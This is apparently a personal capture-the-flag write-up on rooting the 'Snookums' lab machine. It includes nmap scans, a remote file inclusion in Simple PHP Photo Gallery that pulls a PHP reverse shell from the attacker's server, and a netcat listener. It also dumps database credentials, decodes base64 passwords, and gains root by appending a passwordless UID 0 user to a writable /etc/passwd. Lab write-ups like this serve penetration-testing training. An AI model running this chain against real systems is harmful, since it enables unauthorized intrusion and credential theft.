TCP Ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 06:03 +08
Nmap scan report for 192.168.179.58
Host is up (0.041s latency).
Not shown: 65515 filtered tcp ports (no-response), 12 closed tcp ports (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
33060/tcp open mysqlx
Nmap done: 1 IP address (1 host up) scanned in 13.47 seconds
TCP Service Scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 06:03 +08
Nmap scan report for 192.168.179.58
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.45.164
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:79:67:12:c7:ec:13:3a:96:bd:d3:b4:7c:f3:95:15 (RSA)
| 256 a8:a3:a7:88:cf:37:27:b5:4d:45:13:79:db:d2:ba:cb (ECDSA)
|_ 256 f2:07:13:19:1f:29:de:19:48:7c:db:45:99:f9:cd:3e (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Simple PHP Photo Gallery
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open mysql MySQL (unauthorized)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.94SVN%I=7%D=11/24%Time=67425152%P=x86_64-pc-linux-gnu
SF:%r(NULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\
SF:x0b\x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HT
SF:TPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0
SF:\x0b\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNS
SF:VersionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestT
SF:CP,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\
SF:x0fInvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a
SF:\0")%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08
SF:\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCo
SF:okie,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x
SF:0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20messa
SF:ge\"\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgN
SF:eg,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\
SF:x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x0
SF:5HY000")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDStr
SF:ing,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20messag
SF:e\"\x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOpt
SF:ions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x0
SF:5\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05H
SF:Y000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05
SF:\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0
SF:")%r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20messag
SF:e\"\x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: Host: SNOOKUMS; OS: Unix
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.10.4)
| Computer name: snookums
| NetBIOS computer name: SNOOKUMS\x00
| Domain name: \x00
| FQDN: snookums
|_ System time: 2024-11-23T17:04:21-05:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-11-23T22:04:22
|_ start_date: N/A
|_clock-skew: mean: 1h39m58s, deviation: 2h53m14s, median: -2s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.03 seconds
Port 80
Port 80 is running a Simple PHP Photo Gallery (v0.8).
http://192.168.179.58/
Simple PHP Photo Gallery
Found RFI exploit on exploitdb: https://www.exploit-db.com/exploits/48424
[+] site.com/image.php?img= [ PAYLOAD ]
Inspecting one of the images, we get the relative path of the image: images/examples/image-1.jpg
RFI exploit
http://192.168.179.58/image.php?img=images/examples/image-1.jpg
with the relative path of the image, we try the RFI.
It kinda works.
/etc/passwd
root❌0:0:root:/root:/bin/bash bin❌1:1:bin:/bin:/sbin/nologin daemon❌2:2:daemon:/sbin:/sbin/nologin adm❌3:4:adm:/var/adm:/sbin/nologin lp❌4:7:lp:/var/spool/lpd:/sbin/nologin sync❌5:0:sync:/sbin:/bin/sync shutdown❌6:0:shutdown:/sbin:/sbin/shutdown halt❌7:0:halt:/sbin:/sbin/halt mail❌8:12:mail:/var/spool/mail:/sbin/nologin operator❌11:0:operator:/root:/sbin/nologin games❌12💯games:/usr/games:/sbin/nologin ftp❌14:50:FTP User:/var/ftp:/sbin/nologin nobody❌99:99:Nobody:/:/sbin/nologin systemd-network❌192:192:systemd Network Management:/:/sbin/nologin dbus❌81:81:System message bus:/:/sbin/nologin polkitd❌999:998:User for polkitd:/:/sbin/nologin sshd❌74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix❌89:89::/var/spool/postfix:/sbin/nologin chrony❌998:996::/var/lib/chrony:/sbin/nologin michael❌1000:1000:Michael:/home/michael:/bin/bash apache❌48:48:Apache:/usr/share/httpd:/sbin/nologin mysql❌27:27:MySQL Server:/var/lib/mysql:/bin/false tss❌59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin rpc❌32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
We can also read the /etc/passwd file, but this is really just LFI, so let’s try RFI next.
Real RFI
I started a python HTTP server and tried to connect it via the RFI. http://192.168.179.58/image.php?img=http://192.168.45.164:4444
It took quite a long while to load but it does connect.
phpinfo
I created a shell.php with phpinfo() to test if it will execute PHP code.
<?php phpinfo(); ?>
It does.
Error in executing PHP code
Initially I started the python HTTP server on a random port and couldn’t get any execution. Also the RFI took forever to load.
So I tried changing to a port that is open on the target machine which is 445 in this case and it loaded fast and actually executed the PHP code.
PHP Reverse Shell
I replaced the phpinfo with Ivan Sincek’s PHP reverse shell generated on https://www.revshells.com/.
Similar to hosting the HTTP server on an open port, I used an open port to open a nc listener:
sudo wrapnc 21
[sudo] password for hans:
listening on [any] 21 ...
connect to [192.168.45.169] from (UNKNOWN) [192.168.165.58] 43838
Linux snookums 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
18:50:04 up 48 min, 0 users, load average: 0.00, 0.01, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
bash: no job control in this shell
bash-4.2$
Shell as apache
Looking at the /var/www/html directory we see a db.php with some credentials.
bash-4.2$ cd /var/www/html
bash-4.2$ ls
README.txt image.php phpGalleryConfig.php
UpgradeInstructions.txt images phpGalleryStyle-RED.css
css index.php phpGalleryStyle.css
db.php js phpGallery_images
embeddedGallery.php license.txt phpGallery_thumbs
functions.php photos thumbnail_generator.php
bash-4.2$ cat db.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?>
mysql
I tried several times before this and it hanged after I entered the password. What changed was upgrading the shell. I suppose that it requires an interactive shell.
bash-4.2$ mysql -u root -p
Enter password: MalapropDoffUtilize1337
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 15
Server version: 8.0.20 MySQL Community Server - GPL
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
We saw the database SimplePHPGal earlier in the db.php file. We use that database and find that there’s a users table.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| SimplePHPGal |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.01 sec)
mysql> use SimplePHPGal
Database changed
mysql> show tables;
+------------------------+
| Tables_in_SimplePHPGal |
+------------------------+
| users |
+------------------------+
1 row in set (0.00 sec)
mysql> select * from users;
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| josh | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== |
| serena | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ== |
+----------+----------------------------------------------+
3 rows in set (0.00 sec)
We find a few credentials here with their hashed passwords. Looking at the /home directory, we have michael.
bash-4.2$ cd /home
bash-4.2$ ls -al
total 0
drwxr-xr-x. 3 root root 21 Jun 9 2020 .
dr-xr-xr-x. 17 root root 224 Jun 9 2020 ..
drwx------. 2 michael michael 100 Jul 9 2020 michael
Seems like the password is encoded in base64, judging by the == at the end.
| michael | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== |
When decoding, it gives me another base64 value. Decoding it again gives me the password.
[09:59] hans@parrot ~/Documents/PGPractice/Snookums/2-shell
% echo "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" | base64 -d
SG9ja1N5ZG5leUNlcnRpZnkxMjM=
[09:59] hans@parrot ~/Documents/PGPractice/Snookums/2-shell
% echo "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" | base64 -d | base64 -d
HockSydneyCertify123
SSH as michael
ssh [email protected]
The authenticity of host '192.168.165.58 (192.168.165.58)' can't be established.
ED25519 key fingerprint is SHA256:rouy0/8CKEfhPY0eheyBSXy00UrbHzUFfNIMlNdCNfI.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:9: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.165.58' (ED25519) to the list of known hosts.
[email protected]'s password:
[michael@snookums ~]$ cat local.txt
7c82f17841a3b82c9a047e95da9a0e05
Writable /etc/passwd
[michael@snookums /]$ ls -ld /etc/passwd
-rw-r--r--. 1 michael root 1162 Jun 22 2021 /etc/passwd
Shockingly, michael is the owner of /etc/passwd and is able to write it.
root
We simply insert a new root user (hacker) into /etc/passwd having the id, 0, and an empty password. after switching user with su hacker, we are root.
[michael@snookums /]$ echo 'hacker::0:0::/root:/bin/bash' >>/etc/passwd
[michael@snookums /]$ su hacker
[root@snookums /]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@snookums /]# cd ~
[root@snookums ~]# cat proof.txt
9af2bd4a317f7128972cfd5a7f317233